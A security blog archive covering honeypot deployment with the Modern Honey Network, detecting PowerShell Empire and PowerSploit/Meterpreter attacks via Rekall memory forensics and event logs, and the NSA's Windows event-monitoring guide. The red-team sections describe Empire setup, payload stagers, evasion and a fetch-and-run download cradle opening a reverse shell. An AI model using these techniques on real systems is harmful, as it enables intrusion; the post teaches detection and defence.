Sunday, September 27, 2015

Using the Modern Honey Network to Detect Malicious Activity

The Modern Honey Network

The Modern Honey Network (MHN) is an amazing honeypot framework created by the great team at ThreatStream. MHN simplifies honeypot deployment and data collection into a central management system. From MHN you can send output to an ELK instance, Splunk or even an ArcSight digestible format. I personally output the data to Splunk because MHN has also made an elegant Splunk application that renders MHN data quite nicely.

MHN comes pre built with deployment scripts for the following honeypots:
  • Dionaea
  • Conpot
  • Kippo
  • Amun
  • Glastopf
  • Wordpot
  • ShockPot
  • Elastichoney
MHN also comes with scripts to install Snort and Suricata for IPS alerting as well as instructions to add additional honeypots to the framework. As mentioned earlier, the deployment scripts are designed to automatically feed their information back into MHN, which is then displayed within the MHN WebUI, ELK, ArcSight, or better yet, Splunk. Update: MHN also comes with p0F, which is not a honeypot but a passive fingerprint scanner.

Installation and Configuration

If you're interested in installing MHN on a server or VM you can follow the instructions by n0where.net. I installed MHN and the associated honeypots in Docker containers for convenience. This effectively isolates and compartmentalizes the services and allows multiple services that run locally on similar ports (such as 80 or 443) to use different "external" ports on the host machine.

To install MHN on Docker start a container with the following command:

docker run -p 10000:10000 -p 80:80 -p 3000:3000 -p 8089:8089 --name mhn  --hostname=mhndocker -t -i ubuntu:14.04.2 /bin/bash
*Note: 8089 is specified if you are using the Splunk forwarder. You can chose between 80 and 443. You can also make the host OS' port separate from the docker container's port by using [hostport]:[dockerport], which is convenient for honeypots.
Next, create and run the following script:
#!/bin/bash

set -x

apt-get update 
apt-get upgrade -y 
apt-get install git wget gcc supervisor -y 
cd /opt/ 
git clone https://github.com/threatstream/mhn.git 
cd mhn

cat > /etc/supervisor/conf.d/mhntodocker.conf <<EOF
[program:mongod]
command=/usr/bin/mongod
stdout_logfile=/var/log/supervisor/%(program_name)s.log
stderr_logfile=/var/log/supervisor/%(program_name)s.log
autorestart=true
autostart=true

[program:nginx]
command=/usr/sbin/nginx
stdout_events_enabled=true
stderr_events_enabled=true
autostart=true
autorestart=true

EOF

mkdir -p /data/db /var/log/mhn /var/log/supervisor

supervisord &

#Starts the mongod service after installation
echo supervisorctl start mongod >> /opt/mhn/scripts/install_mongo.sh

./install.sh

supervisorctl restart all 
Don't forget to reference the host's IP address or hostname as the MHN server's IP during the ./install.sh script (not the docker container's IP address) unless you are using Docker's internal networking for Honeypot to MHN communication.
Unfortunately, due to the interactive nature of MHN's installation, supervisord is manually running in the background instead of as a started service. To restart the container later use:
docker start <containerID> 
docker exec <containerID> supervisord &
To deploy a honeypot go to the 'deploy' section in the MHN WebUI and select your honeypot from the drop-down list. Then, either copy the wget command or the script contents and run either in your honeypot system. 
MHN Deployment Page


Installing honeypots in containers uses a similar but less complex method where you: create an Ubuntu 14.04 container with your host and internal port mappings, install the required services (such as wget, sshd, python, supervisord, etc.) and run the install command or script from MHN deployment page above. There are consequences to installing honeypots on docker containers since some honeypots require direct interface access, which Docker supports, but reduces performance significantly. So decide how important packet capture is to your installation and choose appropriately. I'm not going to go through the installation instructions for each container, but if needed I can provide guidance.

Run the following command to generate Splunk friendly output:
cd /opt/mhn/scripts/
sudo ./install_hpfeeds-logger-splunk.sh
This will log the events as key/value pairs to /var/log/mhn-splunk.log. This log should be monitored by the SplunkUniveralForwarder.

To create an output for ArcSight run:
cd /opt/mhn/scripts/
sudo ./install_hpfeeds-logger-arcsight.sh
This will log the events as CEF to /var/log/mhn-arcsight.log

Now you have MHN installed with Honeypots feeding information into it. 
MHN Main Page

Configuring Honeypots

Once MHN is up and running an important question to ask is where to deploy honeypots and for what purpose. There are primarily three locations that a Honeypot can be installed:

1. Internally
Internal honeypots provide a low-noise, high value, alarm system that lets you know when someone is performing attacking your internal servers. In theory, nothing should ever hit your internal honeypots minus perhaps vulnerability scanners, which you can whitelist from any alarm. I would recommend deploying Kippo, Conpot  Dionaea, and Amun (although Amun is a new addition to MHN and I haven't had the opportunity to play around with it yet) across your environment, and especially in high-value networks. I would also consider Shockpot and any other honeypot that mimics services you run internally such as WordPot or Glastopf.

2. Externally
Opening an IP or specific ports on your firewall to Honeypots can let you know who is scanning your perimeter environment looking for vulnerabilities. Although it is difficult to action external scans into an alert since you will have both legitimate and illegitimate scans against your external addresses.

3. Globally
The third option is to rent a server in the cloud and place MHN Honeypots on random public IPs. You can then use this data to compare your external MHN data to try to determine who is randomly scanning the internet versus who is specifically targeting you. Although this is a very unscientific way of going about this, it cannot hurt to have more information for investigative purposes. This type of deployment is often used to gather generic threat data that is fed to IP/URL/Hash blacklist databases.

Feeding Your Data into Splunk

I won't go into much detail about what reports to create with MHN's external and global data because I think that MHN has done a great job with the MHN Splunk application that I mentioned earlier. The application displays summary data for each of the honeypots on a dashboard home page.
Main MHN Splunk App page
Splunk Conpot Page
Splunk Dionea Page
For a free and open source product, I'm pretty impressed by the work ThreatStream has put into MHN. I hope that they continue this trend.

What To Do With The Data

Honeypot data utilization relies heavily on the context of the data. Internal Honeypot hits are far more important to investigate than external or global hits. That said, some uses include:
  • When something unexpected hits an internal honeypot start an investigation ASAP.
  • A report of your top external honeypot hits to understand who's making the most noise, what they're trying to hit and how frequent the connections are. This will give you an idea of where to tighten security and how you can tailor your patch management program. It may also provide data points that can be used to narrow threat hunting efforts on the network (such as confirming that targeted attacks on the perimeter we're all dropped and that no traffic from the malicious external IPs was allowed through).
  • An alert that takes the top 1000 global/external honeypot source IP addresses in the past month and compares them to your firewall traffic to see if any non-honeypot connection lasted longer than thirty seconds or contained more than 1MB of data.
  • Threshold vectors for when a particular connection makes an unusually high number of connections to an external honeypot such as over 50-5000 (depending on how popular you are).
  • Understand what countries your attackers are originating from to create rules looking for successful authentications/unusual connections from those geographic locations.
  • Identify what usernames attackers use to attempt automated authentication and ban them within your organization.
    • For my honeypot it's root, admin, test, user, MGR, oracle, postgres, guest, ubnt and ftpuser.
  • Identify what passwords that authentication spammers use to try to authenticate to ensure that your password complexity rules meet minimum requirements
    • For my honeypots it's 123456, password, admin, root, 1234, test, 12345, guest, default and oracle.
  • Collect packet samples of potentially malicious traffic for custom IPS signatures.

If you enjoy this post/project please be sure to thank the MHN project and volunteers and to support the Honeynet Project.

P.S. check out this great introduction video by Jason Tro.

Wednesday, September 23, 2015

Empire Post-Exploitation Analysis with Rekall and PowerShell Windows Event Logs

In my last blog entry I explored some post-exploitation possibilities using PowerShell and Matt Graeber's repository of penetration testing tools, PowerSploit. PowerSploit, like PowerTools, is a set of fantastic scripts capable of accomplishing siloed tasks; however, they lack the modularity and plug-ability of a complete framework. Today I want to talk about a relatively new entrant to the field—PowerShell Empire.

Although Empire is only a couple of months old, the developers (who also worked on Veil) have built an impressive lightweight management architecture that borrows heavily from projects like PowerSploit and PowerTools to create a "pure PowerShell post-exploitation agent built on cryptographically-secure communications and a flexible architecture." While working with it the past couple of days I have found that it has a familiar workflow for those who are accustomed to Metasploit, making it easy to use for penetration testing Windows environments.

I have used Metasploit for many years, dabbled with Core Impact, and explored Armitage/Cobalt Strike at great length. These are all fantastic frameworks that are incredibly extensible, have strong community support and regular development release cycles. But the PowerSploit framework isn't exactly 'built-in' to those solutions (Cobalt Strike allows you to import modules making it perhaps the easiest to extend in terms of PowerShell based attacks). I've had a few conversations recently with people who are unsure about what framework they should be using and my answer is always the same, it depends. What you select is largely dependent on financial limitations and objectives but in the end it is probably best that you get familiar with all of these offerings.

There are a couple of key features in Empire:
  • Invoke Expression and Web Client download cradles allow you to stay off disk as much as possible. Evading on-access scanners is crucial and leaving as few forensic artifacts as possible is just good trade-craft.
  • The agent beacons in a cryptographically secure manner and in a way that effectively emulates command and control traffic.
As penetration testers our goal should be to effectively mimic real-world attack methodologies, network traffic and end-point activity to provide clients with a set of indicators of compromise that can be effectively used to identify monitoring gaps. Tools like Empire help to push these ideas forward and reduce the latency between attacker innovation and defender evolution.

In this post I want to demonstrate how to use Empire, conduct basic IR memory analysis (in the same format as my previous article) and, more importantly, highlight some discussion around automated detection at the network and host level.

Red Team

I used Kali (2.0) for my server but I'm sure this would work on most Debian based distributions.
git clone https://github.com/PowerShellEmpire/Empire.git
cd Empire/setup
./install.sh
Simple. To launch Empire, execute the following command from the Empire root directory with the -debug switch enabled to ensure logs are stored for troubleshooting and tracing your activity:
./empire -debug
Empire uses the concept of listeners, stagers and agents. A listener is a network socket instantiated on the server side that manages connections from infected agents. A stager is the payload you intend to deliver to the victim machine. To access your listeners simply type ‘listeners’ to enter the listeners context, followed by ‘info’.

There are a few important values to note here. First, you can specify a KillDate and WorkingHours to limit agent and listener activity based on project limitations. I have certainly worked on a number of engagements in which a client had very specific restrictions about when we could work, which would have proved invaluable.

Second, the DefaultJitter value will help evade solutions that attempt to identify malicious beacon patterns that occur at a constant interval, and imply scripted or machine like activity that obviously stands out from natural human browsing patterns. There is also a DefaultProfile that defines the communication pattern that the agent uses to beacon home, which we will talk more about later.

Third, define variables using 'set [variablename] [value]' syntax, and activate the listener with the 'execute' command . Type list to verify that the listener is active and a network socket has been opened.

Logically the next step is define a payload and select a payload delivery mechanism. Type 'usestager'  followed by TAB+TAB to see a list of options.


The two options that are best suited for payload execution are launcher and macro. Launcher will generate a PowerShell one-liner (Base64 encoded or clear text) that automatically sets the required staging key/listener values. Macro creates an office macro with the appropriate callback values to establish a connection with the listener. This can be embedded in an office document and used in social engineering attacks as a payload delivery mechanism. 

To select a stager type 'usestager [stagername] [listenername]' followed by 'execute'


In the image above you can see that the listener callback details are embedded in the script, and a (possibly) hard-coded value of /index.asp is used for the agent GET request. The session value for the agent is included. Base64 encoding the script will turn on the '-Enc' PowerShell flag which will decrypt the payload at run-time making investigation and tractability more difficult (again, simulating a real breach.) 

After executing this one-liner on our victim machine you will receive a callback notification that a new connection has been established. You can observe active agents by typing 'agents' followed by 'list'. 

Now that a connection is established you can type 'interact [agentname]' to hop into an agent session similar to meterpreter. Enter 'usemodule' followed by TAB+TAB to see all available options. You can identify privilege escalation opportunities, move laterally, establish persistence, steal tokens/credentials, install key-loggers and run all of the amazing post exploitation tasks available from the PowerSploit/PowerTools exploitation kits. I don't want to go into detail for each of these modules as it is not the intent of this post. I simply wanted to demonstrate how to get up and running to encourage more offensive-security professionals to embrace this tool. 

Blue Team

My objective for the defensive aspect of this post is to conduct some high level analysis of the tool itself and the general methods it employs. There are a lot of modules available and of course each of these may leave behind specific indicators of attack/compromise but it's not my goal to go into each of them for this post.

Let's take a look at some of the network traffic first.


We see that after the initial stager is executed our first connection is established. On its own this is an extremely poor indicator. GET requests to /index.asp are going to be very common on any network. However, it does appear to be a hard-coded value and it's important to gather as much information as possible. 

After this initial connection a second stage payload is downloaded, key negotiation occurs, an encrypted session is established and the agent starts beaconing. This beacon is characterized by the DefaultProfile variable set for the listener running on the Empire server. 

We can see the beacon issues 3 GET requests within a short period of time during a call home interval. The requests are sent to /news.asp, /admin/get.php, /login/process.jsp and have a generic Mozilla User-Agent.

Again, individually each of these actions appears benign and alerting on it would generate a significant number of false positives (which is the intention of the framework.) If we look at this traffic collectively we could design a network IDS rule that alerts when a connection is made to /index.ASP and is followed by at least three GET requests to at least two of the GET requests in the image above.

Moreover, many organizations may issue tight controls around the type of Browser application that can be installed, and it is unlikely to see a Windows server with Firefox running. If you are a system administrator that has implemented application white-listing and your users should only be using IE, the presence of Mozilla/Chrome/Opera UA indicates a policy violation (best case scenario) or a manually crafted UA (worst case possibly indicating malware). In any event, it is possible to at least use this information to profile other infected hosts even if it doesn't serve as a point of initial detection. It's good to have options.

Of course all of this can be customized in Empire, so from a heuristic perspective I think the important take away really is recognizing the pattern itself and not necessarily the specific implementation of that pattern. That is a little bit esoteric so let's try and gather more information from the host.

Dave recently published a two part series on Windows event monitoring. This is a fantastic starting point for most organizations, especially those who are new to SIEM. I still come across a lot of environments that do not have any formal log management program, let alone a properly deployed SIEM with a good alerting framework that has been adequately tuned. For most companies, implementing monitoring for the event IDs Dave highlighted is a good objective. But for those with a more mature security program, I think it's important to start looking at PowerShell events.

PowerShell 2.0 is the default installed version for Windows 7 and Server 2008 R2 (prior versions do not have PowerShell installed) and unfortunately it does not provide much information from a logging perspective.

There are primarily two log files that are accessible:
  • Microsoft Windows PowerShell
  • Microsoft Windows PowerShell Operational
It is also possible to enable analytic and debug logging however this is fairly noisy and resource intensive. Open Event Viewer and select View -> Show Analytic and Debug Logs. Then browse Application and Service Logs -> Microsoft -> Windows -> PowerShell and right click Analytic to enable it. I don't think there is a lot of value add here but it can be useful when debugging a script or troubleshooting a problem.

In the 2.0 version of the Microsoft Windows PowerShell Operational log you will have the following events of interest:
  • 40961 - Console is starting up
  • 40962 - Console is ready for user input
These logs do contain meta information such as the user who performed the event, and the computer it was executed on but it is pretty limited. If you do not use PowerShell in your environment (even small organizations have use cases so this is unlikely) then perhaps alerting on one of these events may be useful but there is very little contextual data stored in the event log to indicate what was done while the console was accessed.

The Microsoft Windows PowerShell log in version 2.0 of PowerShell will often generate these event IDs:
  • 600 - Provider Life-cycle
  • 400 - Engine Life-cycle
  • 403 - Engine Life-cycle
Again these events are fairly nondescript and provide little information. 

Event ID 5156 from the Windows Security audit log can provide some additional information regarding network connections if we effectively filter to alert on Outbound, external, connections generated from applications like powershell.exe.  


None of these indicators are of any substantial quality, but thankfully Microsoft introduced some improvements in version 3.0 of PowerShell (no additional changes to event logging functionality in version 4.0 or 5.0 unfortunately).

After upgrading to PowerShell version 3.0 you can specify a GPO setting to turn on module logging for Windows PowerShell modules in all sessions of all affected computers. Pipeline execution events for the selected modules will then be recorded in the PowerShell event logs I covered earlier. You can also interactively enable these values as shown below. This is shown in the image below:
If we now execute our PowerShell Empire one-line stager we will have more event log data to work with. Event IDs 4103 and 800 are recorded and contain a veritable wealth of information that can be used to detect suspicious activity. 

At this point we can launch Rekall, list processes, identify suspect network connections, dump process memory and perform keyword string searches.

This is a similar workflow to my prior post. In large memory dumps it can be difficult (time consuming) to navigate or CTRL+F search through a document for specific keywords. Mark Russinovich's strings can greatly reduce this work effort but a better solution in my opinion is to write Yara rules and use them in conjunction with Volatility. If you aren't familiar, Yara is a tool designed to help execute binary or textual pattern match searches. It is very easy to write rules as the syntax is easy to pick up. Save the following to a text file with the .YARA extension.

rule example : powershell

{   
     meta:
           Description = "Look for suspect powershell artificats."
           filetype = "MemoryDump"         
           Author = "Greg Carson"
           Date = "09-09-2015"
    
     strings:
           $s0 = "Invoke-" ascii
           $s1 = "-Enc" ascii

     condition:
           2 of them
}


This can then be imported to perform a search in Volatility:
vol.py -f image.raw --profile=Win7SP1x64 yarascan -y yarafilename.yara -p 7860

The workflow demonstrated on the Blue Team side of things isn't necessarily in any order. Ideally, you would have a SIEM rule trigger based on a suspicious pipeline execution PowerShell event (that has appropriate filters and suppression enabled), which results in an investigation of network traffic prior to and shortly after the event and is followed by a more thorough live memory forensic analysis of the system and others it may have had contact with. But this may not be possible depending on the environment you find yourself in. It's important not to rely on any one single security solution as the indicators of attack will often exist in many different places and across disparate entities that solve different problems.

EDIT:
@tifkin_ contacted me to mention an additional tool from Mark Russinovich titled 'Sysmon'. It's a little bit outside the scope of this post but the tool itself shows a lot of promise, I'd recommend defenders look into this.

Monday, September 21, 2015

Spotting the Adversary with Windows Event Log Monitoring, Part II

Events to Monitor in a Windows Environment

Part II

Recently, on part I of Spotting the Adversary with Window Event Log Monitoring,  I walked you through the first half of NSA's guide to spotting malicious behaviour using Windows event logs. In part II I will go through the second half of the guide:
  1. AppLocker
  2. System or Service Failures
  3. Windows Update Errors
  4. Kernel Driver Signing Errors
  5. Group Policy Errors
  6. Mobile Device Activities
  7. Printing Services
  8. Windows Firewall

9. AppLocker

Windows 7/2008R2 introduced Microsoft's AppLocker, which Microsoft describes as:
AppLocker is a new feature in Windows Server 2008 R2 and Windows 7 that advances the features and functionality of Software Restriction Policies. AppLocker contains new capabilities and extensions that allow you to create rules to allow or deny applications from running based on unique identities of files and to specify which users or groups can run those applications.
It is a great product for  restricting the authorized software on a user's machine or production server. As such, when AppLocker is installed, reports and alerts should be configured that notify you when an AppLocker violation occurs. Recommended alerts include:
  • Alerts on AppLocker violations on production servers outside of change windows
  • Reports on all user AppLocker violations
Table-1: AppLocker Blocked Events
The server alert,  of course, depends on the size of your environment and control over the machines. If this is unreasonable,  you may want to focus the alert on high-severity servers and create a report for everything else.

10. System or Service Failures

This is a difficult set of alerts/reports to properly utilize. A system or service failure should not happen on a regular occasion. That said, something on my personal security environment seems to fail on a bi-daily occasion. On the other hand, if a Windows service continues to fail repeatedly on the same machines, it may indicate that an attacker is targeting the service.

Table-2: System or Service Failures
My recommendation is to focus on the absolute highest-severity systems at first, to take a report for the first couple of weeks of system/service failures, get a feel for your environment and then create alerts/reports depending on the stability of your environment because one malfunctioning system crashing every couple of hours to minutes can make your entire SIEM environment noisy and a factor to ignore instead of respond.

11. Windows Update Errors

Depending on how your environment's update policy is applied, an ad-hoc or scheduled report of Windows Update Errors should be created to be able to identify Microsoft Windows Update failures. Typically my recommendation is at least a report, and an alert for high-severity assets if constant diligence is a factor.

Table-3: Microsoft Windows Update Errors

12. Kernel Driver Signing Errors

Microsoft introduced Kernel driver signing in Microsoft Vista 64-bit to improve defense against inserting malicious drivers or code into the kernel. Typically any indication of a protected driver violation may indicate malicious activity or a disk error and warrants investigation; however, much like the System or Service Failures, I recommend creating a report and monitoring your environment for a few weeks to ensure that there are no repeat offenders that will spam your SIEM alerting engine.

Table-4: Kernel Driver Signing Errors

13. Group Policy Errors

Microsoft's built-in group policy functionality is an amazing way to ensure consistent security and configuration properties are applied to all Windows domain machines within your environment. The inability to apply a group-policy setting should be investigated immediately to determine the source. Depending on the size of your domain and frequency of GPO updates, I may recommend a report over an alert just because one failure across your domain could provide thousands of alerts instantly.

Table-5: Group Policy Errors

14. Mobile Device Activities

Mobile activities on a system are part of daily operations, so there is no need to report or alert directly on them. However, an abnormal number of disconnects or wireless association status messages may indicate a rogue wifi hotspot attempting to intercept your user's wireless traffic. Therefore, it may be important to log mobile activity traffic, and, if your SIEM is capable, to create a threshold or trending alert to notify you when there are an above-average number of mobile events.

Table-6: Mobile Device Activities

15. Printing Services

Microsoft Print Service events are more of a good-to-have event useful for tracing who printed what in case of an internal data leak. That said, the massive amount of events that a print server can make tracking printing events prohibitive (I have seen print servers generate more events than an active directory server.) If possible, you way wish to offload printer events to a log server instead of a SIEM for historical service. A simple SNARE/ELK/Syslog-NG solution may work very well.

Table-7: Printing Services

16. Windows Firewall

Windows Firewall modifications or service status outside of a change window/Windows update should not take place. As such, an alert indicating a firewall policy modification or status change is recommended for servers and high-severity assets. A report for user activities may be prudent depending on whether your users have administrative access or not (hopefully not!)

Table-8: Windows Firewall
There you have it. The NSA's Spotting the Adversary with Windows Event Log Monitoring is an excellent starting guide for alerts/reports in a new SIEM environment. My only complaint is that they forgot Windows Task schedules, which are often used by malicious entities for privilege escalation, malicious code execution, etc. Otherwise, hopefully between the NSA's original guide and this breakdown you have a healthy set of alerts and reports to start with. 

Friday, September 18, 2015

Triaging PowerShell Exploitation with Rekall

David recently published his article Spotting the Adversary so I figured I'd continue the trend and focus on Blue Team tactics in this post.

I've spent a fair bit of time in EnCase. They have a great product and a number of solutions to fit most of your needs, but at times it can feel bulky and a little stiff. Moreover, it has an arguably non-intuitive user interface and is an expensive solution that a lot of organizations cannot afford. Volatility is fantastic but for this post I wanted to focus specifically on Rekall. Incident Response and Forensics require a superb understanding of operating system internals, file system structures, and malware behavior patterns, but tools like Volatility and Rekall greatly reduce the barrier to entry for security analysts and service providers.

Rekall is a complete end to end memory forensics framework (branched from Volatility itself). The developers of this project wanted to focus on improving modularity, usability, and performance. One of the most significant advantages to using Rekall is that at allows for local or remote live forensic analysis. For this reason it is a core component of the Google Rapid Response tool.

In this article I wanted to document a common offensive tactic and then briefly step through some investigatory steps. This is by no means a complete incident response process, and the scenario assumes the attacker has some level of access to the system or network already.

Red Team

I am a big fan of Matt Graeber's PowerSploit. PowerSploit is essentially a set of PowerShell scripts designed to aid penetration testers during all phases of an assessment. You can use it to inject DLLs, reflectively load PE files, insert shellcode, bypass anti-virus, load Mimikatz and do all sorts of other wonderful and nefarious things. PowerShell has become extremely popular as an attack vector in the last two years as it is a native trusted process, lacks comprehensive security mechanisms (excluding perhaps the most recent versions), and is an extremely powerful scripting language (direct API support for Windows internals).

In our scenario we assume that the attacker has a limited shell and wants to gain more significant access. First let's set up our listener:
I've elected to use the Reverse_HTTPS Meterpreter payload as the PowerSploit Invoke-Shellcode script used later on only supports the Reverse_HTTPS and Reverse_HTTP variants (and as such it is preferable to pass this traffic over SSL).

On the compromised machine we will now execute a PowerShell one-liner to retrieve the Invoke-Shellcode PS1 script from the PowerSploit GitHub page. This is a nice method of retrieval as GitHub is not a suspicious or inherently untrustworthy page and the request is submitted over HTTPS (which can help with evasion at the URL filtering/web traffic content inspection layers). Additional levels of evasion can be employed by encrypting our PS1 script but I'm not going to explore that option for the purposes of this demo.
What's happening here? PowerShell is calling IEX (Invoke-Expression) to generate a new WebClient object and calls the DownloadString function to retrieve the URL. The Invoke-Shellcode script is executed with the switches that will instantiate a connection to our MSF listener. This is all executed in the context of the PowerShell process itself.

In Metasploit we see a session is established and migrate processes. In this example I am migrating to Notepad. This is not good trade-craft and I'm only doing this to make things more discernible and easy to grasp forensically in the next section.
At this point we can start looking at things from the other perspective.

Blue Team

First let's drop WinPMem on the system. WinPMem is a kernel mode driver that allows us to gain access to physical memory and map it is a device. 
Once this is done we can use Rekall to perform live memory forensics on the system. Navigate to your Rekall install directory and run the following command to mount the WinPMem device:
rekall.exe -f \\.\pmem
This will launch a Rekall interactive console.  Rekall has support for a lot of native plugins (that you are likely familiar with if you have ever used Volatility). Typing plugins. [tab] [tab] will print a list of options. To get additional information type plugins.[pluginname]? Many plugins also have switches that allow you to filter your query based on a specified criteria. To see the list of available switches type pluginname [tab].

A good starting point is the netscan plugin. 
You should also run pslist when starting your analysis to understand what processes are running. Nothing out of the ordinary but as we continue to browse we see Notepad has a network socket established:
It is clear that this process has been hooked as Notepad should never establish network connections. Let's use the LDRModules plugin to detect unlinked DLLs.
We see a list of unlinked DLLs and some that stand out as extremely suspicious. So we know that Notepad was injected into by a different process (or spawned by malware using a technique known as process hollowing). Obviously for this example we know that Meterpreter migrated to this process.

Meterpreter has a fairly standard migration process:
  1. Identify the PID.
  2. Scan for architecture of target process.
  3. Check if the SeDebugPrivilege is set to get handle to target process.
  4. Calculate payload length.
  5. Call OpenProcess() to gain access to Virtual Memory of target process.
  6. Call VirtualAllocEx() to assign PAGE_EXECUTE_READWRITE.
  7. Call WriteProcessMemory() to write the payload into the target process allocated memory region.
  8. Call CreateRemoteThread() to execute the payload.
  9. Close the prior thread from the old Meterpreter session.
In knowing this we look for additional suspect processes. I like to look for cmd.exe or powershell.exe and dump these processes memory regions for string analysis. When I ran pslist earlier I identified a PowerShell process and ran the memdump pid=[PowerShellPID] plugin. This will produce a DMP file that you can load in your favorite editor.  
I was able to find suspicious strings by searching for keywords such as 'IEX', 'Download', and other commands that might be used by an attacker. At this point I am able to extract the full PowerSploit script from memory and have identified that my attacker downloaded a Meterpreter stager. From an Incident Response perspective we have numerous Indicators of Compromise to work with.

Lastly, ProcExplorer from Mark Russinovich is a great tool for at a glance identification of suspect activity. Let's look at spawned threads and stack information from a normal Notepad process relative to a hooked one:
This is by no means a complex attack and there is much more we can do from a memory analysis perspective, but I think the material covered serves as a gentle introduction to the topic. I'll likely follow up on this post in the future and go into more depth but hopefully this information is enough to get you started.

There are a number of fantastic writers covering these types of topics in the blogosphere and I wanted to link to them here as they are all doing amazing work. I came across some great posts while doing research:
http://holisticinfosec.blogspot.ca/2015/05/toolsmith-attack-detection-hunting-in.html
http://www.tekdefense.com/news/2013/12/23/analyzing-darkcomet-in-memory.html
http://www.behindthefirewalls.com/2013/07/zeus-trojan-memory-forensics-with.html
https://github.com/volatilityfoundation
http://www.rekall-forensic.com/
https://github.com/google/grr
https://github.com/google/rekall/releases/tag/v1.3.2


Thursday, September 17, 2015

Spotting the Adversary with Windows Event Log Monitoring

Events to Monitor in a Windows Environment


O.K. you have purchased a SIEM, added your Windows servers and you're ready to create your use-cases. You draw a blank. The amazing part about a SIEM is that you can build use-cases for literally thousands of scenarios. Unfortunately, however, the problem with a SIEM is that you have to create literally tens of thousands of alerts to monitor said use-cases. Monitoring for five failed logins followed by a successful login is great, but what good is the alert if the account locks after three failed attempts? Or if you have 10,000 users to monitor? To add to this, according to Verizon's 2013 Data Breach Report, 76% of breaches involved stolen or weak credentials. So what to monitor for?

I find that it is often best to start with the basics-to report and/or alert on basic system functionality at the start, and to build more advanced use-cases based on abnormal behaviour outside of your companies policies.

Fortunately, the friendly folks at the NSA have written Spotting the Adversary with Windows Event Log Monitoring, a great guide that walks you through what they have determined are the 16 primary categories to focus on within Windows event logs to ensure system security. We will be going through the first eight in part I, and the second eight in part II.
  1. Clearing Event Logs
  2. Account Usage
  3. Remote Desktop Logon Detection
  4. Windows Defender Activities
  5. Application Crashes
  6. Software and Service Installation
  7. External Media Detection
  8. Pass the Hash Detection
  9. AppLocker
  10. System or Service Failures
  11. Windows Update Errors
  12. Kernel Driver Signing
  13. Group Policy Errors
  14. Mobile Device Activities
  15. Printing Services
  16. Windows Firewall
Before I start I want to clarify a not-so-obvious gotcha about Windows event logs for newcomers--Windows NT to Windows 2003 event IDs are identified via three digits; however, Windows Vista/Windows 2008 and beyond event IDs are identified by a four-digit ID. Therefore, any event ID with three digits is only applicable to Windows 2003 and before (and four digits beyond 2003.) Another useful tip is Randy's Ultimate Windows Security, which provides detailed information on nearly every Windows security event.

1. Clearing Event Logs

This is often the first alert I will install in a client's environment. There are very few reasons to clear the audit log directly, if the audit log is too large the event log's maximum size should be set to a smaller size. As such, outside of an improperly configured device an event log would only be cleared to hide malicious activities. As such, a simple alert looking for the following events is usually sufficient.
Table-1: Event Log Cleared

2. Account Usage

A proper set of alerts and reports for improper account activity is key to a useful SIEM. Setting an alert for X failed logins may drive your SOC crazy every Monday morning after a long weekend, but setting this threshold to alert when it occurs after-hours or on non-user systems could indicate malicious behaviour.

The size of your environment and your companies security policies will weigh heavily on the value of certain actions being an alert or a report--a team of 200 may have a weekly report on created users, whereas a team of 20,000 may have a daily report. As such I will make my recommendations based on generalizations of a business with 1,000 users:

  • A weekly report for created users and users added to privileged groups;
  • An alert for Security-enabled group modifications;
  • An alert for service account failed logins or account lockouts, although this is prone to alert-spamming in the case of an incorrectly configured script or service continually trying to log in;
  • An alert for three non-service failed logins to a non-user system after-hours;
  • Interactive logins by a service account; and
  • A successful user login from a non-whitelisted country

Table-2: Account Usage
Of course this is not a complete list of recommended alerts or reports, rather a couple of examples to get you started.

3. Remote Desktop Logon Detection

Remote desktop alerts and reports are tricky. Datacenter jumpboxes are the most used machines--they are the most heavily used, store endless amounts of 'temporary' data, and are often the most sought after machine by a hacker. Typically once a hacker gains access to a jumpbox they have access to your most valuable resources, so tracking access is very important.

But how do you identify when access is malicious? In a 24h SOC access will be made 24 hours a day, so after-hour logins are not useful. This is something that I usually need to discuss in length with a client to really understand their environment before making remote desktop alerts. Some general concepts are:

  • If your jumpbox is accessed from a specific subnet, alert when the connection is made from a different subnet, such as the DMZ.
  • Alert when a service account attempts to connect to a jumpbox
  • Alert or report for after-hour connections during non-change-window hours
Table-3: Remote Desktop Logins
A remote desktop login is a standard login with a Logon Type of 10. Logon types are indicators of the login methodology used during the login--interactive, network, batch service, etc. They are essential for understanding how someone accessed a system. There is a large difference between a user logging in after hours via an RDP session and a new scheduled task.

4. Windows Defender Activities


This is pretty straight forward--a windows defender event shows detected malware/failed scan/failed update, etc. Essentially all events should be an alert.

Table-4: Windows Defender

5. Application Crashes

Application crashes are difficult to judge whether they will be effective alerts or reports in a client's environment. I tend to try to determine if the company has the resources available to perform an active investigation as towards why the application crashed. In the least a report or alert should be made for your high-value assets. That said, application crashes can be an indication of malicious code interfacing with an application to exploit it or replace it.

Table-5: Application Crashes

6. Software and Service Installation

Installed software and services should be at the least a report, and an alert for high priority assets (although change-window time frames can be excluded to avoid false-positives.)
Table-5: Software and Service Installation

7. External Media Detection

There should always be a legitimate reason for plugging an external device into a high-value asset. An alert is recommended for medium to high severity events, and it is good to monitor external devices that are plugged in a new service is run within a few minutes on the system as this often indicates that something has executed off of the external media.

Table-6: External Media Detection

8. Pass the Hash Detection

Tracking user accounts for detecting Pass the Hash (PtH) requires creating a custom view with XML to configure more advanced filtering options. The event query language is based on XPath, query language for selecting nodes from an XML document

Spotting the Adversary has defined a QueryList described below that is limited in detecting PtH attacks. These queries focus on discovering lateral movement by an attacker using local accounts that are not part of the domain. The QueryList captures events that show a local account attempting to connect remotely to another machine not part of the domain. This event is a rarity so any occurrence should be treated as suspicious.

In the QueryList below, substitute the <DOMAIN NAME> section with the desired domain name.
<QueryList>
<Query Id="0" Path="ForwardedEvents">
<Select Path="ForwardedEvents">
*[System[(Level=4 or Level=0) and (EventID=4624)]]
and
*[EventData[Data[@Name='LogonType'] and (Data='3')]]
and
*[EventData[Data[@Name='AuthenticationPackageName'] = 'NTLM']]
and
*[EventData[Data[@Name='TargetUserName'] != 'ANONYMOUS LOGON']]
and
*[EventData[Data[@Name='TargetDomainName'] != '<DOMAIN NAME>']]
</Select>
</Query>

</QueryList>

These XPath queries are used for the Event Viewer’s Custom Views, and are not applicable to a SIEM itself.

The successful use of PtH for lateral movement between workstations would trigger the following:
   - Event ID 4624 
   - Event level Information 
   - LogonType of
   - Logon method is NTLM authentication 
   - A not-domain logon and not ANONYMOUS account. 

Table-8: Pass the Hash Successful Logon Properties

A failed PtH logon attempt would have all of the above properties except Event ID 4625 indicating a failed logon:
Table-9: Pass the Hash Failed Logon Properties

Conclusion

